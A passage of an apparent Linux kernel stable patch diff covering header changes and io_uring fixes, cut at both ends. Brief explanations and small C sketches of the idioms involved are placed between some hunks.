++ * it's not sufficient to add __function_aligned here as that will not ensure
++ * that callees are correctly aligned.
++ *
++ * See:
++ *
++ *   https://lore.kernel.org/lkml/Y77%2FqVgvaJidFpYt@FVFF77S0Q05N
++ *   https://gcc.gnu.org/bugzilla/show_bug.cgi?id=88345#c9
++ */
++#if !defined(CONFIG_CC_IS_GCC) || (CONFIG_FUNCTION_ALIGNMENT == 0)
++#define __cold				__attribute__((__cold__))
++#else
++#define __cold
++#endif
++
+ /* Builtins */
+ 
+ /*
+diff --git a/include/linux/context_tracking.h b/include/linux/context_tracking.h
+index dcef4a9e4d63e..d4afa8508a806 100644
+--- a/include/linux/context_tracking.h
++++ b/include/linux/context_tracking.h
+@@ -130,9 +130,36 @@ static __always_inline unsigned long ct_state_inc(int incby)
+ 	return arch_atomic_add_return(incby, this_cpu_ptr(&context_tracking.state));
+ }
+ 
++static __always_inline bool warn_rcu_enter(void)
++{
++	bool ret = false;
++
++	/*
++	 * Horrible hack to shut up recursive "RCU isn't watching" failures,
++	 * since lots of the actual reporting also relies on RCU.
++	 */
++	preempt_disable_notrace();
++	if (rcu_dynticks_curr_cpu_in_eqs()) {
++		ret = true;
++		ct_state_inc(RCU_DYNTICKS_IDX);
++	}
++
++	return ret;
++}
++
++static __always_inline void warn_rcu_exit(bool rcu)
++{
++	if (rcu)
++		ct_state_inc(RCU_DYNTICKS_IDX);
++	preempt_enable_notrace();
++}
++
+ #else
+ static inline void ct_idle_enter(void) { }
+ static inline void ct_idle_exit(void) { }
++
++static __always_inline bool warn_rcu_enter(void) { return false; }
++static __always_inline void warn_rcu_exit(bool rcu) { }
+ #endif /* !CONFIG_CONTEXT_TRACKING_IDLE */
+ 
+ #endif
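warn_rcu_enter()/warn_rcu_exit() let a warning path temporarily mark the CPU as "RCU watching", since printk and tracing inside WARN themselves rely on RCU and would recurse when fired from an extended quiescent state. A hypothetical call site (not taken from this patch) would bracket the warning like so:

/* Report from a context that may be in an RCU extended quiescent
 * state (e.g. on the way into idle).  warn_rcu_enter() bumps the
 * dynticks state so RCU is watching while the warning fires;
 * warn_rcu_exit() undoes exactly what was done, and does nothing
 * if RCU was already watching. */
static void report_something(bool bad)
{
	bool rcu = warn_rcu_enter();

	WARN_ON_ONCE(bad);	/* printk/tracing here rely on RCU */
	warn_rcu_exit(rcu);
}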
+diff --git a/include/linux/device.h b/include/linux/device.h
+index 44e3acae7b36e..f4d20655d2d7e 100644
+--- a/include/linux/device.h
++++ b/include/linux/device.h
+@@ -328,6 +328,7 @@ enum device_link_state {
+ #define DL_FLAG_MANAGED			BIT(6)
+ #define DL_FLAG_SYNC_STATE_ONLY		BIT(7)
+ #define DL_FLAG_INFERRED		BIT(8)
++#define DL_FLAG_CYCLE			BIT(9)
+ 
+ /**
+  * enum dl_dev_state - Device driver presence tracking information.
+diff --git a/include/linux/fwnode.h b/include/linux/fwnode.h
+index 89b9bdfca925c..5700451b300fb 100644
+--- a/include/linux/fwnode.h
++++ b/include/linux/fwnode.h
+@@ -18,7 +18,7 @@ struct fwnode_operations;
+ struct device;
+ 
+ /*
+- * fwnode link flags
++ * fwnode flags
+  *
+  * LINKS_ADDED:	The fwnode has already be parsed to add fwnode links.
+  * NOT_DEVICE:	The fwnode will never be populated as a struct device.
+@@ -36,6 +36,7 @@ struct device;
+ #define FWNODE_FLAG_INITIALIZED			BIT(2)
+ #define FWNODE_FLAG_NEEDS_CHILD_BOUND_ON_ADD	BIT(3)
+ #define FWNODE_FLAG_BEST_EFFORT			BIT(4)
++#define FWNODE_FLAG_VISITED			BIT(5)
+ 
+ struct fwnode_handle {
+ 	struct fwnode_handle *secondary;
+@@ -46,11 +47,19 @@ struct fwnode_handle {
+ 	u8 flags;
+ };
+ 
++/*
++ * fwnode link flags
++ *
++ * CYCLE:	The fwnode link is part of a cycle. Don't defer probe.
++ */
++#define FWLINK_FLAG_CYCLE			BIT(0)
++
+ struct fwnode_link {
+ 	struct fwnode_handle *supplier;
+ 	struct list_head s_hook;
+ 	struct fwnode_handle *consumer;
+ 	struct list_head c_hook;
++	u8 flags;
+ };
+ 
+ /**
+@@ -198,7 +207,6 @@ static inline void fwnode_dev_initialized(struct fwnode_handle *fwnode,
+ 		fwnode->flags &= ~FWNODE_FLAG_INITIALIZED;
+ }
+ 
+-extern u32 fw_devlink_get_flags(void);
+ extern bool fw_devlink_is_strict(void);
+ int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup);
+ void fwnode_links_purge(struct fwnode_handle *fwnode);
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 8677ae38599e4..48563dc09e171 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -619,6 +619,7 @@ struct hid_device {							/* device report descriptor */
+ 	unsigned long status;						/* see STAT flags above */
+ 	unsigned claimed;						/* Claimed by hidinput, hiddev? */
+ 	unsigned quirks;						/* Various quirks the device can pull on us */
++	unsigned initial_quirks;					/* Initial set of quirks supplied when creating device */
+ 	bool io_started;						/* If IO has started */
+ 
+ 	struct list_head inputs;					/* The list of inputs */
+diff --git a/include/linux/ima.h b/include/linux/ima.h
+index 5a0b2a285a18a..d79fee67235ee 100644
+--- a/include/linux/ima.h
++++ b/include/linux/ima.h
+@@ -21,7 +21,8 @@ extern int ima_file_check(struct file *file, int mask);
+ extern void ima_post_create_tmpfile(struct user_namespace *mnt_userns,
+ 				    struct inode *inode);
+ extern void ima_file_free(struct file *file);
+-extern int ima_file_mmap(struct file *file, unsigned long prot);
++extern int ima_file_mmap(struct file *file, unsigned long reqprot,
++			 unsigned long prot, unsigned long flags);
+ extern int ima_file_mprotect(struct vm_area_struct *vma, unsigned long prot);
+ extern int ima_load_data(enum kernel_load_data_id id, bool contents);
+ extern int ima_post_load_data(char *buf, loff_t size,
+@@ -76,7 +77,8 @@ static inline void ima_file_free(struct file *file)
+ 	return;
+ }
+ 
+-static inline int ima_file_mmap(struct file *file, unsigned long prot)
++static inline int ima_file_mmap(struct file *file, unsigned long reqprot,
++				unsigned long prot, unsigned long flags)
+ {
+ 	return 0;
+ }
+diff --git a/include/linux/kernel_stat.h b/include/linux/kernel_stat.h
+index ddb5a358fd829..90e2fdc17d79f 100644
+--- a/include/linux/kernel_stat.h
++++ b/include/linux/kernel_stat.h
+@@ -75,7 +75,7 @@ extern unsigned int kstat_irqs_usr(unsigned int irq);
+ /*
+  * Number of interrupts per cpu, since bootup
+  */
+-static inline unsigned int kstat_cpu_irqs_sum(unsigned int cpu)
++static inline unsigned long kstat_cpu_irqs_sum(unsigned int cpu)
+ {
+ 	return kstat_cpu(cpu).irqs_sum;
+ }
+diff --git a/include/linux/kprobes.h b/include/linux/kprobes.h
+index a0b92be98984e..85a64cb95d755 100644
+--- a/include/linux/kprobes.h
++++ b/include/linux/kprobes.h
+@@ -378,6 +378,8 @@ extern void opt_pre_handler(struct kprobe *p, struct pt_regs *regs);
+ DEFINE_INSN_CACHE_OPS(optinsn);
+ 
+ extern void wait_for_kprobe_optimizer(void);
++bool optprobe_queued_unopt(struct optimized_kprobe *op);
++bool kprobe_disarmed(struct kprobe *p);
+ #else /* !CONFIG_OPTPROBES */
+ static inline void wait_for_kprobe_optimizer(void) { }
+ #endif /* CONFIG_OPTPROBES */
+diff --git a/include/linux/libnvdimm.h b/include/linux/libnvdimm.h
+index af38252ad7045..e772aae718431 100644
+--- a/include/linux/libnvdimm.h
++++ b/include/linux/libnvdimm.h
+@@ -41,6 +41,9 @@ enum {
+ 	 */
+ 	NDD_INCOHERENT = 7,
+ 
++	/* dimm provider wants synchronous registration by __nvdimm_create() */
++	NDD_REGISTER_SYNC = 8,
++
+ 	/* need to set a limit somewhere, but yes, this is likely overkill */
+ 	ND_IOCTL_MAX_BUFLEN = SZ_4M,
+ 	ND_CMD_MAX_ELEM = 5,
+diff --git a/include/linux/mlx4/qp.h b/include/linux/mlx4/qp.h
+index 9db93e487496a..b6b626157b03a 100644
+--- a/include/linux/mlx4/qp.h
++++ b/include/linux/mlx4/qp.h
+@@ -446,6 +446,7 @@ enum {
+ 
+ struct mlx4_wqe_inline_seg {
+ 	__be32			byte_count;
++	__u8			data[];
+ };
+ 
+ enum mlx4_update_qp_attr {
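
Adding the flexible data[] member documents that the inline segment payload follows
the header in the same buffer, and gives that payload an addressable name. The
flexible-array-member idiom in a standalone sketch (struct and names are
illustrative):

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct inline_seg_sketch {
	uint32_t byte_count;
	uint8_t  data[];	/* flexible array member, adds no size */
};

int main(void)
{
	const char payload[] = "inline data";
	struct inline_seg_sketch *seg =
		malloc(sizeof(*seg) + sizeof(payload));

	if (!seg)
		return 1;
	seg->byte_count = sizeof(payload);
	memcpy(seg->data, payload, sizeof(payload));
	free(seg);
	return 0;
}
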
+diff --git a/include/linux/msi.h b/include/linux/msi.h
+index a112b913fff94..15dd71817996f 100644
+--- a/include/linux/msi.h
++++ b/include/linux/msi.h
+@@ -631,6 +631,8 @@ int msi_domain_prepare_irqs(struct irq_domain *domain, struct device *dev,
+ 			    int nvec, msi_alloc_info_t *args);
+ int msi_domain_populate_irqs(struct irq_domain *domain, struct device *dev,
+ 			     int virq, int nvec, msi_alloc_info_t *args);
++void msi_domain_depopulate_descs(struct device *dev, int virq, int nvec);
++
+ struct irq_domain *
+ __platform_msi_create_device_domain(struct device *dev,
+ 				    unsigned int nvec,
+diff --git a/include/linux/nfs_ssc.h b/include/linux/nfs_ssc.h
+index 75843c00f326a..22265b1ff0800 100644
+--- a/include/linux/nfs_ssc.h
++++ b/include/linux/nfs_ssc.h
+@@ -53,6 +53,7 @@ static inline void nfs42_ssc_close(struct file *filep)
+ 	if (nfs_ssc_client_tbl.ssc_nfs4_ops)
+ 		(*nfs_ssc_client_tbl.ssc_nfs4_ops->sco_close)(filep);
+ }
++#endif
+ 
+ struct nfsd4_ssc_umount_item {
+ 	struct list_head nsui_list;
+@@ -66,7 +67,6 @@ struct nfsd4_ssc_umount_item {
+ 	struct vfsmount *nsui_vfsmount;
+ 	char nsui_ipaddr[RPC_MAX_ADDRBUFLEN + 1];
+ };
+-#endif
+ 
+ /*
+  * NFS_FS
+diff --git a/include/linux/poison.h b/include/linux/poison.h
+index 2d3249eb0e62d..0e8a1f2ceb2f1 100644
+--- a/include/linux/poison.h
++++ b/include/linux/poison.h
+@@ -84,4 +84,7 @@
+ /********** kernel/bpf/ **********/
+ #define BPF_PTR_POISON ((void *)(0xeB9FUL + POISON_POINTER_DELTA))
+ 
++/********** VFS **********/
++#define VFS_PTR_POISON ((void *)(0xF5 + POISON_POINTER_DELTA))
++
+ #endif
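
VFS_PTR_POISON follows the existing poison-pointer pattern: a distinctive non-NULL
constant that faults recognizably if ever dereferenced. A sketch with
POISON_POINTER_DELTA fixed at 0 purely for illustration (the kernel may offset it
into a guaranteed-unmapped range):

#include <stdio.h>

#define POISON_POINTER_DELTA 0
#define VFS_PTR_POISON ((void *)(0xF5 + POISON_POINTER_DELTA))

int main(void)
{
	void *stale = VFS_PTR_POISON;

	/* Code can test for the poison value instead of chasing it. */
	if (stale == VFS_PTR_POISON)
		printf("pointer was poisoned, not reused: %p\n", stale);
	return 0;
}
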
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index 03abf883a281b..8d4bf695e7666 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -238,6 +238,7 @@ void synchronize_rcu_tasks_rude(void);
+ 
+ #define rcu_note_voluntary_context_switch(t) rcu_tasks_qs(t, false)
+ void exit_tasks_rcu_start(void);
++void exit_tasks_rcu_stop(void);
+ void exit_tasks_rcu_finish(void);
+ #else /* #ifdef CONFIG_TASKS_RCU_GENERIC */
+ #define rcu_tasks_classic_qs(t, preempt) do { } while (0)
+@@ -246,6 +247,7 @@ void exit_tasks_rcu_finish(void);
+ #define call_rcu_tasks call_rcu
+ #define synchronize_rcu_tasks synchronize_rcu
+ static inline void exit_tasks_rcu_start(void) { }
++static inline void exit_tasks_rcu_stop(void) { }
+ static inline void exit_tasks_rcu_finish(void) { }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU_GENERIC */
+ 
+@@ -374,11 +376,18 @@ static inline int debug_lockdep_rcu_enabled(void)
+  * RCU_LOCKDEP_WARN - emit lockdep splat if specified condition is met
+  * @c: condition to check
+  * @s: informative message
++ *
++ * This checks debug_lockdep_rcu_enabled() before checking (c) to
++ * prevent early boot splats due to lockdep not yet being initialized,
++ * and rechecks it after checking (c) to prevent false-positive splats
++ * due to races with lockdep being disabled.  See commit 3066820034b5dd
++ * ("rcu: Reject RCU_LOCKDEP_WARN() false positives") for more detail.
+  */
+ #define RCU_LOCKDEP_WARN(c, s)						\
+ 	do {								\
+ 		static bool __section(".data.unlikely") __warned;	\
+-		if ((c) && debug_lockdep_rcu_enabled() && !__warned) {	\
++		if (debug_lockdep_rcu_enabled() && (c) &&		\
++		    debug_lockdep_rcu_enabled() && !__warned) {		\
+ 			__warned = true;				\
+ 			lockdep_rcu_suspicious(__FILE__, __LINE__, s);	\
+ 		}							\
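
The reordered macro reads the lockdep-enabled flag both before and after evaluating
the condition, so a racing lockdep shutdown between the two reads cannot produce a
splat for a condition that only held while checking was being torn down. The shape
of that guard in a userspace sketch, with checking_enabled() and condition() as
stand-ins for the kernel helpers:

#include <stdbool.h>
#include <stdio.h>

static bool checking_enabled(void) { return true; }
static bool condition(void)        { return false; }

#define WARN_ONCE_GUARDED(c, s)					\
	do {							\
		static bool warned;				\
		if (checking_enabled() && (c) &&		\
		    checking_enabled() && !warned) {		\
			warned = true;				\
			fprintf(stderr, "warning: %s\n", (s));	\
		}						\
	} while (0)

int main(void)
{
	WARN_ONCE_GUARDED(condition(), "suspicious usage");
	return 0;
}
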
+diff --git a/include/linux/rmap.h b/include/linux/rmap.h
+index bd3504d11b155..2bdba700bc3e3 100644
+--- a/include/linux/rmap.h
++++ b/include/linux/rmap.h
+@@ -94,7 +94,7 @@ enum ttu_flags {
+ 	TTU_SPLIT_HUGE_PMD	= 0x4,	/* split huge PMD if any */
+ 	TTU_IGNORE_MLOCK	= 0x8,	/* ignore mlock */
+ 	TTU_SYNC		= 0x10,	/* avoid racy checks with PVMW_SYNC */
+-	TTU_IGNORE_HWPOISON	= 0x20,	/* corrupted page is recoverable */
++	TTU_HWPOISON		= 0x20,	/* do convert pte to hwpoison entry */
+ 	TTU_BATCH_FLUSH		= 0x40,	/* Batch TLB flushes where possible
+ 					 * and caller guarantees they will
+ 					 * do a final flush if necessary */
+diff --git a/include/linux/transport_class.h b/include/linux/transport_class.h
+index 63076fb835e34..2efc271a96fa6 100644
+--- a/include/linux/transport_class.h
++++ b/include/linux/transport_class.h
+@@ -70,8 +70,14 @@ void transport_destroy_device(struct device *);
+ static inline int
+ transport_register_device(struct device *dev)
+ {
++	int ret;
++
+ 	transport_setup_device(dev);
+-	return transport_add_device(dev);
++	ret = transport_add_device(dev);
++	if (ret)
++		transport_destroy_device(dev);
++
++	return ret;
+ }
+ 
+ static inline void
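
The fix adds the standard error-unwind step: if transport_add_device() fails, the
state created by transport_setup_device() must be torn down rather than leaked. The
pattern in miniature, with stand-in helpers:

#include <stdio.h>

static void setup(void)   { puts("setup"); }
static int  add(void)     { return -1; }	/* simulate failure */
static void destroy(void) { puts("destroy (unwound after failed add)"); }

static int register_device_sketch(void)
{
	int ret;

	setup();
	ret = add();
	if (ret)
		destroy();	/* previously leaked on this path */
	return ret;
}

int main(void)
{
	return register_device_sketch() ? 1 : 0;
}
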
+diff --git a/include/linux/uaccess.h b/include/linux/uaccess.h
+index afb18f198843b..ab9728138ad67 100644
+--- a/include/linux/uaccess.h
++++ b/include/linux/uaccess.h
+@@ -329,6 +329,10 @@ copy_struct_from_user(void *dst, size_t ksize, const void __user *src,
+ 	size_t size = min(ksize, usize);
+ 	size_t rest = max(ksize, usize) - size;
+ 
++	/* Double check if ksize is larger than a known object size. */
++	if (WARN_ON_ONCE(ksize > __builtin_object_size(dst, 1)))
++		return -E2BIG;
++
+ 	/* Deal with trailing bytes. */
+ 	if (usize < ksize) {
+ 		memset(dst + size, 0, rest);
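
__builtin_object_size(dst, 1) is the GCC/clang builtin behind the new check: when
the compiler can see the destination's real size, a ksize that exceeds it is
rejected before any copy. A standalone sketch; note the bound degrades to "unknown"
when the compiler cannot track the object, in which case the check never fires:

#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct args { int a, b; };

static int checked_copy(void *dst, size_t ksize, const void *src)
{
	if (ksize > __builtin_object_size(dst, 1))
		return -1;	/* would overflow the known object */
	memcpy(dst, src, ksize);
	return 0;
}

int main(void)
{
	struct args dst, src = { 1, 2 };

	printf("ok: %d\n", checked_copy(&dst, sizeof(dst), &src));
	return 0;
}
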
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 5562097276336..c6584a3524638 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1956,7 +1956,12 @@ void sk_common_release(struct sock *sk);
+  *	Default socket callbacks and setup code
+  */
+ 
+-/* Initialise core socket variables */
++/* Initialise core socket variables using an explicit uid. */
++void sock_init_data_uid(struct socket *sock, struct sock *sk, kuid_t uid);
++
++/* Initialise core socket variables.
++ * Assumes struct socket *sock is embedded in a struct socket_alloc.
++ */
+ void sock_init_data(struct socket *sock, struct sock *sk);
+ 
+ /*
+diff --git a/include/sound/hda_codec.h b/include/sound/hda_codec.h
+index eba23daf2c290..bbb7805e85d8e 100644
+--- a/include/sound/hda_codec.h
++++ b/include/sound/hda_codec.h
+@@ -259,6 +259,7 @@ struct hda_codec {
+ 	unsigned int relaxed_resume:1;	/* don't resume forcibly for jack */
+ 	unsigned int forced_resume:1; /* forced resume for jack */
+ 	unsigned int no_stream_clean_at_suspend:1; /* do not clean streams at suspend */
++	unsigned int ctl_dev_id:1; /* old control element id build behaviour */
+ 
+ #ifdef CONFIG_PM
+ 	unsigned long power_on_acct;
+diff --git a/include/sound/soc-dapm.h b/include/sound/soc-dapm.h
+index 77495e5988c12..64915ebd641ee 100644
+--- a/include/sound/soc-dapm.h
++++ b/include/sound/soc-dapm.h
+@@ -16,6 +16,7 @@
+ #include <sound/asoc.h>
+ 
+ struct device;
++struct snd_pcm_substream;
+ struct snd_soc_pcm_runtime;
+ struct soc_enum;
+ 
+diff --git a/include/trace/events/devlink.h b/include/trace/events/devlink.h
+index 24969184c5348..77ff7cfc6049a 100644
+--- a/include/trace/events/devlink.h
++++ b/include/trace/events/devlink.h
+@@ -88,7 +88,7 @@ TRACE_EVENT(devlink_health_report,
+ 		__string(bus_name, devlink_to_dev(devlink)->bus->name)
+ 		__string(dev_name, dev_name(devlink_to_dev(devlink)))
+ 		__string(driver_name, devlink_to_dev(devlink)->driver->name)
+-		__string(reporter_name, msg)
++		__string(reporter_name, reporter_name)
+ 		__string(msg, msg)
+ 	),
+ 
+diff --git a/include/uapi/linux/io_uring.h b/include/uapi/linux/io_uring.h
+index 2780bce62fafe..434f62e0fb72c 100644
+--- a/include/uapi/linux/io_uring.h
++++ b/include/uapi/linux/io_uring.h
+@@ -625,7 +625,7 @@ struct io_uring_buf_ring {
+ 			__u16	resv3;
+ 			__u16	tail;
+ 		};
+-		struct io_uring_buf	bufs[0];
++		__DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs);
+ 	};
+ };
+ 
+diff --git a/include/uapi/linux/vfio.h b/include/uapi/linux/vfio.h
+index 23105eb036fa6..0552e8dcf0cbf 100644
+--- a/include/uapi/linux/vfio.h
++++ b/include/uapi/linux/vfio.h
+@@ -49,7 +49,11 @@
+ /* Supports VFIO_DMA_UNMAP_FLAG_ALL */
+ #define VFIO_UNMAP_ALL			9
+ 
+-/* Supports the vaddr flag for DMA map and unmap */
++/*
++ * Supports the vaddr flag for DMA map and unmap.  Not supported for mediated
++ * devices, so this capability is subject to change as groups are added or
++ * removed.
++ */
+ #define VFIO_UPDATE_VADDR		10
+ 
+ /*
+@@ -1343,8 +1347,7 @@ struct vfio_iommu_type1_info_dma_avail {
+  * Map process virtual addresses to IO virtual addresses using the
+  * provided struct vfio_dma_map. Caller sets argsz. READ &/ WRITE required.
+  *
+- * If flags & VFIO_DMA_MAP_FLAG_VADDR, update the base vaddr for iova, and
+- * unblock translation of host virtual addresses in the iova range.  The vaddr
++ * If flags & VFIO_DMA_MAP_FLAG_VADDR, update the base vaddr for iova. The vaddr
+  * must have previously been invalidated with VFIO_DMA_UNMAP_FLAG_VADDR.  To
+  * maintain memory consistency within the user application, the updated vaddr
+  * must address the same memory object as originally mapped.  Failure to do so
+@@ -1395,9 +1398,9 @@ struct vfio_bitmap {
+  * must be 0.  This cannot be combined with the get-dirty-bitmap flag.
+  *
+  * If flags & VFIO_DMA_UNMAP_FLAG_VADDR, do not unmap, but invalidate host
+- * virtual addresses in the iova range.  Tasks that attempt to translate an
+- * iova's vaddr will block.  DMA to already-mapped pages continues.  This
+- * cannot be combined with the get-dirty-bitmap flag.
++ * virtual addresses in the iova range.  DMA to already-mapped pages continues.
++ * Groups may not be added to the container while any addresses are invalid.
++ * This cannot be combined with the get-dirty-bitmap flag.
+  */
+ struct vfio_iommu_type1_dma_unmap {
+ 	__u32	argsz;
+diff --git a/include/ufs/ufshcd.h b/include/ufs/ufshcd.h
+index 727084cd79be4..97a09a14c6349 100644
+--- a/include/ufs/ufshcd.h
++++ b/include/ufs/ufshcd.h
+@@ -566,9 +566,9 @@ enum ufshcd_quirks {
+ 	UFSHCD_QUIRK_SKIP_DEF_UNIPRO_TIMEOUT_SETTING = 1 << 13,
+ 
+ 	/*
+-	 * This quirk allows only sg entries aligned with page size.
++	 * Align DMA SG entries on a 4 KiB boundary.
+ 	 */
+-	UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE		= 1 << 14,
++	UFSHCD_QUIRK_4KB_DMA_ALIGNMENT			= 1 << 14,
+ 
+ 	/*
+ 	 * This quirk needs to be enabled if the host controller does not
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index db623b3185c82..a4e9dbc7b67a8 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1143,10 +1143,16 @@ static unsigned int handle_tw_list(struct llist_node *node,
+ 			/* if not contended, grab and improve batching */
+ 			*locked = mutex_trylock(&(*ctx)->uring_lock);
+ 			percpu_ref_get(&(*ctx)->refs);
+-		}
++		} else if (!*locked)
++			*locked = mutex_trylock(&(*ctx)->uring_lock);
+ 		req->io_task_work.func(req, locked);
+ 		node = next;
+ 		count++;
++		if (unlikely(need_resched())) {
++			ctx_flush_and_put(*ctx, locked);
++			*ctx = NULL;
++			cond_resched();
++		}
+ 	}
+ 
+ 	return count;
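
The added need_resched() check bounds how long one task-work drain can hog the CPU:
the held context is dropped and the scheduler given a chance before the loop
continues. A userspace analogue of the drain loop, with the resched hint stubbed:

#include <sched.h>
#include <stdio.h>

static int need_resched_stub(int processed)
{
	return processed % 64 == 0;	/* pretend the scheduler asked */
}

static int drain_list(int items)
{
	int count = 0;

	while (items--) {
		/* ... process one work item ... */
		count++;
		if (need_resched_stub(count))
			sched_yield();	/* kernel uses cond_resched() */
	}
	return count;
}

int main(void)
{
	printf("processed %d items\n", drain_list(1000));
	return 0;
}
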
+@@ -1722,7 +1728,7 @@ int io_req_prep_async(struct io_kiocb *req)
+ 	const struct io_op_def *def = &io_op_defs[req->opcode];
+ 
+ 	/* assign early for deferred execution for non-fixed file */
+-	if (def->needs_file && !(req->flags & REQ_F_FIXED_FILE))
++	if (def->needs_file && !(req->flags & REQ_F_FIXED_FILE) && !req->file)
+ 		req->file = io_file_get_normal(req, req->cqe.fd);
+ 	if (!def->prep_async)
+ 		return 0;
+@@ -2790,7 +2796,7 @@ static __poll_t io_uring_poll(struct file *file, poll_table *wait)
+ 	 * pushes them to do the flush.
+ 	 */
+ 
+-	if (io_cqring_events(ctx) || io_has_work(ctx))
++	if (__io_cqring_events_user(ctx) || io_has_work(ctx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 
+ 	return mask;
+@@ -3053,6 +3059,7 @@ static __cold bool io_uring_try_cancel_requests(struct io_ring_ctx *ctx,
+ 		while (!wq_list_empty(&ctx->iopoll_list)) {
+ 			io_iopoll_try_reap_events(ctx);
+ 			ret = true;
++			cond_resched();
+ 		}
+ 	}
+ 
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index ab4b2a1c3b7e8..87426c0c6d3e5 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -3,6 +3,7 @@
+ 
+ #include <linux/errno.h>
+ #include <linux/lockdep.h>
++#include <linux/resume_user_mode.h>
+ #include <linux/io_uring_types.h>
+ #include <uapi/linux/eventpoll.h>
+ #include "io-wq.h"
+@@ -270,6 +271,15 @@ static inline int io_run_task_work(void)
+ 	 */
+ 	if (test_thread_flag(TIF_NOTIFY_SIGNAL))
+ 		clear_notify_signal();
++	/*
++	 * PF_IO_WORKER never returns to userspace, so check here if we have
++	 * notify work that needs processing.
++	 */
++	if (current->flags & PF_IO_WORKER &&
++	    test_thread_flag(TIF_NOTIFY_RESUME)) {
++		__set_current_state(TASK_RUNNING);
++		resume_user_mode_work(NULL);
++	}
+ 	if (task_work_pending(current)) {
+ 		__set_current_state(TASK_RUNNING);
+ 		task_work_run();
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 90326b2799657..02587f7d5908d 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -568,7 +568,7 @@ int io_recvmsg_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	sr->flags = READ_ONCE(sqe->ioprio);
+ 	if (sr->flags & ~(RECVMSG_FLAGS))
+ 		return -EINVAL;
+-	sr->msg_flags = READ_ONCE(sqe->msg_flags) | MSG_NOSIGNAL;
++	sr->msg_flags = READ_ONCE(sqe->msg_flags);
+ 	if (sr->msg_flags & MSG_DONTWAIT)
+ 		req->flags |= REQ_F_NOWAIT;
+ 	if (sr->msg_flags & MSG_ERRQUEUE)
+diff --git a/io_uring/opdef.c b/io_uring/opdef.c
+index 3aa0d65c50e34..be45b76649a08 100644
+--- a/io_uring/opdef.c
++++ b/io_uring/opdef.c
+@@ -313,6 +313,7 @@ const struct io_op_def io_op_defs[] = {
+ 	},
+ 	[IORING_OP_MADVISE] = {
+ 		.name			= "MADVISE",
++		.audit_skip		= 1,
+ 		.prep			= io_madvise_prep,
+ 		.issue			= io_madvise,
+ 	},
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index 2ac1366adbd77..fea739eef56f4 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -650,6 +650,14 @@ static void io_async_queue_proc(struct file *file, struct wait_queue_head *head,
+ 	__io_queue_proc(&apoll->poll, pt, head, &apoll->double_poll);
+ }
+ 
++/*
++ * We can't reliably detect loops where repeated poll triggers keep
++ * failing at issue time. Rather than fail such requests immediately,
++ * allow a certain number of retries before giving up. Given that this
++ * condition should _rarely_ trigger even once, we should be fine with a
++ * larger value.
++ */
++#define APOLL_MAX_RETRY		128
++
+ static struct async_poll *io_req_alloc_apoll(struct io_kiocb *req,
+ 					     unsigned issue_flags)
+ {
+@@ -665,14 +673,18 @@ static struct async_poll *io_req_alloc_apoll(struct io_kiocb *req,
+ 		if (entry == NULL)
+ 			goto alloc_apoll;
+ 		apoll = container_of(entry, struct async_poll, cache);
++		apoll->poll.retries = APOLL_MAX_RETRY;
+ 	} else {
+ alloc_apoll:
+ 		apoll = kmalloc(sizeof(*apoll), GFP_ATOMIC);
+ 		if (unlikely(!apoll))
+ 			return NULL;
++		apoll->poll.retries = APOLL_MAX_RETRY;
+ 	}
+ 	apoll->double_poll = NULL;
+ 	req->apoll = apoll;
++	if (unlikely(!--apoll->poll.retries))
++		return NULL;
+ 	return apoll;
+ }
+ 
+@@ -694,8 +706,6 @@ int io_arm_poll_handler(struct io_kiocb *req, unsigned issue_flags)
+ 		return IO_APOLL_ABORTED;
+ 	if (!file_can_poll(req->file))
+ 		return IO_APOLL_ABORTED;
+-	if ((req->flags & (REQ_F_POLLED|REQ_F_PARTIAL_IO)) == REQ_F_POLLED)
+-		return IO_APOLL_ABORTED;
+ 	if (!(req->flags & REQ_F_APOLL_MULTISHOT))
+ 		mask |= EPOLLONESHOT;
+ 
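
The retry counter turns the removed hard REQ_F_POLLED rejection into a budget:
re-arming is allowed up to APOLL_MAX_RETRY times before the request is failed. A
minimal model of that budget, mirroring the !--retries test above:

#include <stdio.h>

#define MAX_RETRY 128

struct poll_sketch {
	int retries;
};

static int arm_poll(struct poll_sketch *p)
{
	if (--p->retries <= 0)
		return -1;	/* budget exhausted: fail the request */
	return 0;		/* keep retrying */
}

int main(void)
{
	struct poll_sketch p = { .retries = MAX_RETRY };
	int armed = 0;

	while (arm_poll(&p) == 0)
		armed++;
	printf("gave up after %d re-arms\n", armed);
	return 0;
}
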
+diff --git a/io_uring/poll.h b/io_uring/poll.h
+index 5f3bae50fc81a..b2393b403a2c2 100644
+--- a/io_uring/poll.h
++++ b/io_uring/poll.h
+@@ -12,6 +12,7 @@ struct io_poll {
+ 	struct file			*file;
+ 	struct wait_queue_head		*head;
+ 	__poll_t			events;
++	int				retries;
+ 	struct wait_queue_entry		wait;
+ };
+ 
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 18de10c68a151..4cbf3ad725d13 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -1162,14 +1162,17 @@ struct page **io_pin_pages(unsigned long ubuf, unsigned long len, int *npages)
+ 	pret = pin_user_pages(ubuf, nr_pages, FOLL_WRITE | FOLL_LONGTERM,
+ 			      pages, vmas);
+ 	if (pret == nr_pages) {
++		struct file *file = vmas[0]->vm_file;
++
+ 		/* don't support file backed memory */
